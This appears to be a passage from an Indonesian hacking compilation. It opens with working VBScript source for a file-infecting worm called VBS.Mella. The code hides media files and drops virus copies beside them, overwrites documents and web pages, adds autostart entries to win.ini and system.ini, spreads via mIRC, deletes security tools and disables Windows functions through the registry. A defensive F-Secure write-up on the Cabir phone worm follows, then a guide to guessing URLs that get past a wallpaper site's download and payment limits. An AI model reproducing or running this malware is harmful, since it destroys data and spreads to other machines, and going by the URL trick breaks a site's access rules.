Sub CheckDrive() Set Drives=Mella.drives 'untuk semua drive yg ada For Each Drive In Drives 'jika drive aktif panggil CheckDrive() If Drive.IsReady Then Cari Drive & "\" End If 'jika tipe drive ... If Drive.DriveType="2" Or Drive.DriveType="3" Then 'panggil fungsi Cari() Cari Drive & "\" End If Next CheckDrive() End Sub 'fungsi mencari file berdasarkan ekstensinya Function Cari(Path) Set Folder=Mella.GetFolder(Path) Set Files=Folder.Files 'untuk setiap file For Each File In Files 'periksa ekstensi If Mella.GetExtensionName(File.Path)="wav" Or Mella.GetExtensionName(File.Path)="midi" Or Mella.GetExtensionName(File.Path)="mpg" Or Mella.GetExtensionName(File.Path)="mpeg" Or Mella.GetExtensionName(File.Path)="jpg" Or Mella.GetExtensionName(File.Path)="gif" Or Mella.GetExtensionName(File.Path)="bmp" Then 'salin nama asli file NamaAsli=Mella.GetBaseName(File.Path) Set Atribut = Mella.GetFile(File.Path) 'mengubah atribut jadi hidden Atribut.Attributes = Atribut.Attributes + 2 'buat file 'nama asli'.vbs Set Mela=Mella.CreateTextFile(File.ParentFolder & "\" & NamaAsli & ".vbs") 'salin virus Mela.Write KodeVbs 'tutup file Mela.Close() End If 'cek ekstensi If Mella.GetExtensionName(File.Path)="htm" Mella.GetExtensionName(File.Path)="html" Or Mella.GetExtensionName(File.Path)="htt" Or Mella.GetExtensionName(File.Path)="asp" Or Mella.GetExtensionName(File.Path)="php" Then 'overwrite Set Mela=Mella.CreateTextFile(File.Path) 'salin virus Mela.Write KodeHtm 'tutup file Mela.Close() End If 'periksa ekstensi If Mella.GetExtensionName(File.Path)="doc" Or Mella.GetExtensionName(File.Path)="xls" Or Mella.GetExtensionName(File.Path)="ppt" Or Mella.GetExtensionName(File.Path)="mdb" Or Mella.GetExtensionName(File.Path)="rtf" Or Mella.GetExtensionName(File.Path)="txt" Then 'overwrite! Set OverW=Mella.CreateTextFile(File.Path)

'isi file yg di overwrite OverW.WriteLine " Congratulation!" OverW.WriteLine " " OverW.WriteLine " if you can read this information, you have correctly installed" OverW.WriteLine " my virus on your computer." OverW.WriteLine " " OverW.WriteLine " The information below describes my virus details." OverW.WriteLine " _____________________________________________________________" OverW.WriteLine " ššššššššššššššššššššššššššššššššššššššššššššššššššššššššššššš" OverW.WriteLine " š ¤ VBS.Mella ¤ š" OverW.WriteLine " š by mäVerö š" OverW.WriteLine " š august © 2004 š" OverW.WriteLine " ššššššššššššššššššššššššššššššššššššššššššššššššššššššššššššš" OverW.WriteLine " " OverW.WriteLine " švirus name_" OverW.WriteLine " ¤ Mella_Andalusia(vbs)" OverW.WriteLine " šwritten in_" OverW.WriteLine " ¤ Payakumbuh/West Sumatra/Indonesia" OverW.WriteLine " šdate_" OverW.WriteLine " ¤ October 2004" OverW.WriteLine " šspecial thank's to_" OverW.WriteLine " ¤ [K]alamar,crayolarx,kefi,alcopaul, sevenC,iwing" OverW.WriteLine " šgreets_" OverW.WriteLine " ¤ d-e-n-I,adhe,kesepian,joehunt,rinal,phatygeni,khepri`," OverW.WriteLine " ¤ mayat,ob|wan,vuem,jejeng etc" OverW.WriteLine " ¤ all people in #unp,#payakumbuh,#indovirus,#cchome @DALnet" OverW.WriteLine " ¤ all people in #payakumbuh,#padang,#pekanbaru @Allnetwork" OverW.WriteLine " " OverW.WriteLine " ¤ Taste my code dumb!" OverW.WriteLine " " OverW.WriteLine " Copyright©2004 - maVero®" OverW.WriteLine " All Rights Reserved" OverW.WriteLine " _____________________________________________________________" OverW.WriteLine " ššššššššššššššššššššššššššššššššššššššššššššššššššššššššššššš" OverW.WriteLine " Computer System/Electronic Department/Padang State University" OverW.Close End If 'jika win.ini ditemukan If File.Name="win.ini" Then 'panggil fungsi editini() editini File.ParentFolder & "\win.ini","[windows]","load",DirektoriWindows&"\explore.vbs" editini File.ParentFolder & "\win.ini","[windows]","run",DirektoriSystem&"\mtask.vbe" End If 'jika file system.ini ditemukan If File.Name="system.ini" Then

'panggil fungsi editini() editini File.ParentFolder & "\system.ini","[boot]","shell","Explorer.exe "&DirektoriSystem&"\mtask.vbe" End If 'jika mirc ditemukan If File.Name="mirc.ini" Then 'panggil fungsi mella_mirc Mella_mIRC File.ParentFolder editini File.ParentFolder & "\mirc.ini","[text]","ignore","*.exe,*.com,*.bat,*.dll,*.ini,*.vbs" editini File.ParentFolder & "\mirc.ini","[options]","n2","0,1,0,0,1,1,1,1,0,5,35,0,0,1,1,0,1,1,0,5,500,10,0,1,1,0,0" editini File.ParentFolder & "\mirc.ini","[options]","n4","1,0,1,1,0,3,9999,0,0,0,1,0,1024,0,0,99,60,0,0,1,1,1,0,1,1,5000,1" End If 'jika file ditemukan(script blocker=memblok akses createtextfile,regread,regdelete,openfile,dll If File.Name="sbserv.exe" Then 'hapus! Mella.DeleteFile(File.Path) End If 'jika ditemukan deep freeze If File.Name="frzstate.exe" Then 'hapus! Mella.DeleteFile(File.Path) End If 'blank.htm = untuk dikirim denga email If File.Name="blank.htm" Then Set Mela = Mella.CreateTextFile(File.Path) 'tulis virus Mela.Write KodeHtm Mela.close End If 'jika folder.htt ditemukan If File.Name="folder.htt" Then Set Atribut = Mella.GetFile(File.Path) 'set atribut hidden Atribut.Attributes = Atribut.Attributes + 2 Set Mela = Mella.CreateTextFile(File.Path) 'overwrite dengan kode virus Mela.Write KodeHtm Mela.close End If 'payload jika tanggal sekarang 13 dan bulan sekarang maret If Day(Now)=13 and Month(Now)=3 Then 'pesan MsgBox "Selamat Ulang Tahun..." & Vbcrlf & "maVero sayang!",vbexclamation,".:: Mella Andalusia ::." 'disable desktop,regedit,run,drive,display cpanel,shutdown,dos Wella.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\SM_AccessoriesName", "Mella_Andalusia" Wella.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\PF_AccessoriesName", "Mella_Andalusia" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", 1, "REG_DWORD" Wella.regwrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 1, "REG_DWORD" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", 1, "REG_DWORD" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1, "REG_DWORD" Wella.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", 1, "REG_DWORD" End If Next 'cari juga di sub folder Set SubFolders=Folder.SubFolders For Each Subfolder In Subfolders Cari Subfolder.Path Next End Function 'huaaaahhh.... akhirnya siap juga dah jam 12:32 man.. wah blom makan nech.. '---------------------------------------[End of Source Code]--------------------------------

!---(BONUS ARTICEL)---! Bluetooth CABIR Hack (ENGLISH VERSION)

Cabir is a bluetooth using worm that runs in Symbian mobile phones that support Series 60 platform.

Cabir replicates over bluetooth connections and arrives to phone messaging inbox as caribe.sis file what contains the worm. When user clicks the caribe.sis and chooses to install the Caribe.sis file the worm activates and starts looking for new devices to infect over bluetooth.

When Cabir worm finds another bluetooth device it willstart sending infected SIS files to it, and lock to that phone so that it won't look other phones even when the target moves out of range.

Please note that Cabir worm can reach only mobile phones that support bluetooth, and are in discoverable mode.

Setting you phone into non-discoverable (hidden) Bluetooth mode will protect your phone from Cabir worm.

But once the phone is infected it will try to infect other systems even as user tries to disable bluetooth from system settings.

When user clicks on the caribe.sis in phone messaging inbox the phone will display a warning dialog

If user clicks yes the phone will ask normal installation question

If user clicks yes the Cabir worm will activate and show a dialog that contains the name that virus author wants to give to the worm and the authors initialias and group initial 29A. Although it seems that in some phone models, for example Nokia 6600 this dialog is not shown.

Disinfection

Disinfection

F-Secure Anti-Virus for Symbian series 60 http://www.f-secure.com/estore/avmobile.shtml

F-Secure Anti-Virus for Symbian series 60 will detect the Cabir and delete the worm components. After deleting worm files you can delete this directory: c:\system\symbiansecuredata\caribesecuritymanager\

Or you can use our free disinfection tool, available from here as a Symbian SIS installation file which you can download directly to the phone:

1. Open web browser on the phone 2. Go to http://mobile.f-secure.com 3. Select link "Removal tool for Cabir" 4. Download the file and select open after download 5. Install F-Cabir tool 6. Go to applications menu and start F-Cabir 7. Select scan and answer yes when tool asks do you want to disinfect

Or you can download the file from our web site

http://www.f-secure.com/tools/f-cabir.sis

Or here as a Zipped file:

http://www.f-secure.com/tools/f-cabir.zip

Alternatively, you can disinfect the system manually by installing a file manager application and manually deleting these files:

c:\system\apps\caribe\caribe.rsc c:\system\apps\caribe\caribe.app c:\system\apps\caribe\flo.mdl

c:\system\recogs\flo.mdl c:\system\symbiansecuredata\caribesecuritymanager\caribe.app c:\system\symbiansecuredata\caribesecuritymanager\caribe.rsc

Back to the Top

Detailed Description

Replication

Cabir replicates over bluetooth in caribe.sis file that contains the worm main executable caribe.app, system recognizer flo.mdl and resource file caribe.rsc. The SIS file contains autostart settings that will automatically execute caribe.app after the SIS file is being installed.

The caribe.sis file will not arrive automatically to the target device, so user needs to answer yes to the transfer question while the infected device is still in range.

When the Cabir worm is activated it will start looking for other bluetooth devices, and starts sending infected caribe.sis files to the first device it finds. The replication routine in Cabir contains a bug that causes it to lock to first device it finds and it won't look for other devices.

This means that Cabir is capable of sending infected files to only one other device per activation. So Cabir will try to infect one other device when it is activated the first time, and then one more each time when the phone is rebooted.

Also in our tests we found that the newly infected phone will first look for the phone that sent the infected file. So Cabir is capable of spreading widely only in cases where the phone that sent the infected file is out of range before user activates the Cabir in a new phone.

Which means, that while Cabir is capable of spreading in the wild, it would spread quite slowly and would not cause large epidemic.

One curious fact is that in series 60 phones the bluetooth functionality is independent from the GSM side, and if phone is rebooted the cabir will try to spread even if user doesn't enter PIN code.

Infection

When the caribe.sis file is installed the installer will copy the worm executables into following locations: c:\system\apps\caribe\caribe.rsc c:\system\apps\caribe\caribe.app c:\system\apps\caribe\flo.mdl

When the caribe.app is executed it copies the following files: flo.mdl to c:\system\recogs caribe.app to c:\system\symbiansecuredata\caribesecuritymanager\ caribe.rsc to c:\system\symbiansecuredata\caribesecuritymanager\

This is most likely done in case user installs the application to memory card.

Then the worm will recreate the caribe.sis file from worm component files and data blocks that are in caribe.app.

After recreating the caribe.sis file the worm starts to look for all visible bluetooth devices and send the SIS file to them.

Detection

Detection for this malware was published on June 15th, 2004 in the following F-Secure Anti-Virus updates:

[FSAV_Database_Version]

Version=2004-06-15_01

Detection for F-Secure Anti-Virus for Symbian series 60 has been published at 11:55 on June 15th, 2004 in database build number 7.

25. DOWNLOAD WALLPAPER DI SITUS GAME

Situs Gamewallpaper menyediakan wallpaper yang sangat menarik, hanya sayang sekali banyak sekali pembatasan-pembatasan yang dilakukan disitu. Kita ketahui bahwa di www.gamewallpaper.com kita hanya diperbolehkan mengambil 5 gambar dan 3 priview setiap kali kita masuk ke www.gamewallpaper.com, tetapi dengan sedikit trik (menggunakan javascript)kita dapat membuka semua wallpaper yang ada di www.gamewallpaper.com dgn pengecualian hanya utk yang gratisannya saja tanpa menunggu besok hanya untuk mengambil wallpaper lainnya.Tetapi ada beberapa wallpaper(utk yang bayar) yang ada di www.gamewallpaper.com (Nanti saya kasih tau yang mana saja)yang bisa dibuka.Langsung saja saya ke pointnya. Kita hanya membutuhkan dua Browser Internet utk menjalankan triks tersebut diatas,yaitu Internet Explorer browser dan browser Opera (kalo bisa yang paling baru).Memang bisa menggunakan salah satu saja diantara dua browser tersebut akan tetepi bagi yang masih awam akan mengalami kesusahan didalam menjalankan triks ini.Langsung saja,kita buka www.gamewallpaper.com menggunakan Internet Explorer (disarankan),kita lihat pada priview di www.gamewallpaper.com ada yang wallpaper yang gratisan ada yang bayar,pertama kita akan membuka wallpaper yang gratisan dulu,normalnya kita hanya diperbolehkan mengambil/membuka 5 wallpaper saja,tetepi kita akan membuka semuanya tanpa dibatasi. Sebelumnya saya akan menerangkan sedikit tentang stuktur direktori yang ada di www.gamewallpaper.com,semua wallpaper di situs ini semunya disimpan di www.gamewallpaper.com/wallpapers, akan tetepi kita tidak diperbolehkan masuk kesana, wallpaper yang dapat kita buka disini memiliki resolusi yang bervarisi dari resolusi 800x600 pixel sampai 1600x1200 pixel.Lansung saja!!!!!!!!!!!!!!!!Pertama,klik kanan pada bagian priview wallpaper yang kita inginkan lalu pilih properties.(saya malas menjelaskannya) Drag source javascript yang ada paling atas di tampilan properties,contohnya kalo mau ngambil wallpaper stuntman akan terlihat pada properties bagian paling atas adalah “wallpaper_stuntman_02.jpg” setelah source javascript tersebut di drag(Tahan mouse kiri) langsung saja klik kanan lagi lalu pilih copy atau Ctrl+C.lalu kita gabungkan dgn source javascript www.gamewallpaper.com/wallpapers maka hasilnya akan menjadi www.gamewallpaper.com/wallpapers/wallpaper_stuntman_02.jpg .kita lihat bahwa source javascript ini belum lengkap yaitu resolusi dari wallpaper,masukkan angka ini: a)_800(800x600) b)_1024(1024x768) c)_1152(1152x864), d)_1280(1280x960) e)_1280x1024(1280x960) f)_1600(1600x1200) Diakhir source javascript sebelum kata “.jpg”,misalnya saya disini menginginkan resolusi 1024x768 Pixel maka hasil akhir source javascript menjadi sebuah hasil akhir “url”akan terlihat seperti ini : http://www.gamewallpapers.com/wallpapers/wallpaper_stuntman_02_1024.jpg Selanjutnya kita buka browser Opera,saya Pilih Opera karena proses penampilan wallpaper akan lebih cepat di bandingkan I.E.Copy Paste hasil akhir source javascript tersebut ke kotak address di Opera,hasilnya,,,,,,,,,,,,wallpaper yang kita inginkan akan terlihat.Ini belum selesai,lihat kembali http://www.gamewallpapers.com. Pada bagian wallpaper yang kita ambil tadi,Misalnya yang tadi kita ambil wallpaper “stuntman”,lihat pada menu priview wallpaper tersebut,terlihat bahwa wallpaper “stuntman” memiliki 7 jenis wallpaper,maka ganti source javascript akhir yang kita dapat tadi pada bagian angka “02”,

Contohnya:http://www.gamewallpapers.com/wallpapers/wallpaper_stuntman_02_1024.jpg Kita ganti dengan angka jumlah wallpaper yang tersedia,Misalnya kita ingin menampilkan wallpaper yang pertama pada wallpaper “stuntman” maka ganti dgn angka “01”,maka hasil akhirnya akan terlihat http://www.gamewallpapers.com/wallpapers/wallpaper_stuntman_01_1024.jpg. Cukup jelas bukan ,seterusnya cukup ganti dengan jumlah angka banyaknya wallpaper. Oh ya,dari sejumlah wallpaper yang berbayar(yang tidak gratisan) ada beberapa yang bisa dibuka,diantaranya adalah 1)NFSU 2 2)Midnight Club 2 3)World Of WarCraft 4)Spy Hunter 2 5)Age Of Wonder:Shadow Magic 6)Project Ghotam Racing Finally,yang paling mengejutkan adalah dimulai dari halaman(Page) 21 sampai Page 33 pada http://www.gamewallpapers.com semua wallpaper dapat dibuka dari yang bayar sampai yang gratisan,Menurut saya semua wallpaper di http://www.gamewallpapers.com dapat dibuka semua tetapi source javascript dari halaman wallpaper (Untuk Wallpaper yang berbayar)tidak sesuai dengan yang ditampilkan pada source javascript ditampilan Properties.